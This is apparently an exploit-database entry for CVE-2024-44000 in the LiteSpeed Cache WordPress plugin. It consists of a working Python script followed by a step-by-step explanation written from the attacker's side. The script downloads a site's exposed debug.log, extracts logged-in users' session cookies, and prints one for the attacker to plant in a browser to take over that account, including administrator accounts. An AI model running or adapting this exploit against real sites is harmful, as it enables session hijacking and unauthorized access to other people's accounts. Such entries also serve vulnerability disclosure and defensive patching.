# Exploit Title: Litespeed unauthorized account takeover
# Google Dork: [if applicable]
# Date: reported on 17 September 2024
# Exploit Author: Gnzls
# Vendor Homepage: https://www.litespeedtech.com/
# Software Link: https://github.com/gbrsh/CVE-2024-44000?tab=readme-ov-file
# Version: 6.5.0.1
# Tested on: macOS M2 pro
# CVE : CVE-2024-44000




import re
import sys
import requests
import argparse
from urllib.parse import urljoin


def extract_latest_cookies(log_content):
    user_cookies = {}

    pattern_cookie = re.compile(r'Cookie:\s.*?wordpress_logged_in_[^=]+=(.*?)%')

    for line in log_content.splitlines():
        cookie_match = pattern_cookie.search(line)
        if cookie_match:
            username = cookie_match.group(1)
            user_cookies[username] = line

    return user_cookies


def choose_user(user_cookies):
    users = list(user_cookies.keys())
    if not users:
        print("No users found.")
        sys.exit(1)

    # Display user options
    print("Select a user to impersonate:")
    for idx, user in enumerate(users):
        print(f"{idx + 1}. {user}")

    # Get the user's choice
    choice = int(input("Pick a number: ")) - 1

    if 0 <= choice < len(users):
        return users[choice], user_cookies[users[choice]]
    else:
        print("Invalid selection.")
        sys.exit(1)


print("--- LiteSpeed Account Takeover exploit ---")
print("       (unauthorized account access)")
print("\t\t\tby Gonzales")

parser = argparse.ArgumentParser()
parser.add_argument('url', help='http://wphost')

if len(sys.argv) == 1:
    parser.print_help()
    sys.exit(1)

args = parser.parse_args()

log_file_url = urljoin(args.url, 'wp-content/debug.log')

response = requests.get(log_file_url)
if response.status_code == 200:
    log_content = response.text
    ucookies = extract_latest_cookies(log_content)
    choice, cookie = choose_user(ucookies)
    print(f"Go to {args.url}/wp-admin/ and set this cookie:")
    print(cookie.split(']')[1])
else:
    print("Log file not found.")
    sys.exit(1)







1. Overview: Purpose and Target

The script aims to extract cookies (which contain session information) from a WordPress debug.log file, allowing the attacker to impersonate a logged-in user and access their account without authorization.

2. How the Code Works

extract_latest_cookies Function:

Purpose: This function scans the contents of the debug.log file and uses a regular expression to extract cookies for logged-in WordPress users.
How it Works:
The function reads each line of the debug.log file.
It searches for lines that contain cookies using the following regular expression: Cookie:\s.*?wordpress_logged_in_[^=]+=(.*?)%.
This pattern matches WordPress login cookies and extracts the username and cookie value.
The extracted cookie values are stored in a dictionary called user_cookies, where the keys are usernames and the values are the corresponding cookie strings.
choose_user Function:

Purpose: Once cookies are extracted, this function allows the attacker to select which user's cookie to use for impersonation.
How it Works:
It checks if there are any users (i.e., cookies) available.
If no cookies are found, it prints a message and exits the program.
If cookies are found, it prints a list of users and asks the attacker to select one.
Once a user is selected, the function returns the corresponding cookie for that user.
Main Program:

Purpose: The main part of the script handles the workflow of retrieving the debug.log file, extracting cookies, and allowing the attacker to choose which user to impersonate.
How It Works:
The script takes a URL as input, which is the target WordPress site (e.g., http://wphost).
It constructs the URL to the debug.log file (http://wphost/wp-content/debug.log).
The script sends an HTTP request to this URL to fetch the log file.
If the file is found (response status 200), it passes the file content to the extract_latest_cookies function to extract cookies.
The attacker selects which user's cookie to use, and the script prints the cookie information.
The attacker can then use this cookie to impersonate the selected user by setting it in their browser and accessing the WordPress admin panel (/wp-admin/).
requests Library:

This library is used to send HTTP requests to the target site and retrieve the debug.log file.
argparse Library:

This allows the user to input the target WordPress URL from the command line.
sys.exit() Function:

The script uses this to exit the program in case of errors, such as when no users are found or the log file is inaccessible.
3. Potential for Abuse

This script exploits a vulnerability in WordPress by targeting publicly accessible debug.log files. If a site has misconfigured logging, this file might be available to anyone on the internet. By accessing the debug.log file, an attacker can extract sensitive session cookies, impersonate users, and gain unauthorized access to WordPress accounts (including admin accounts).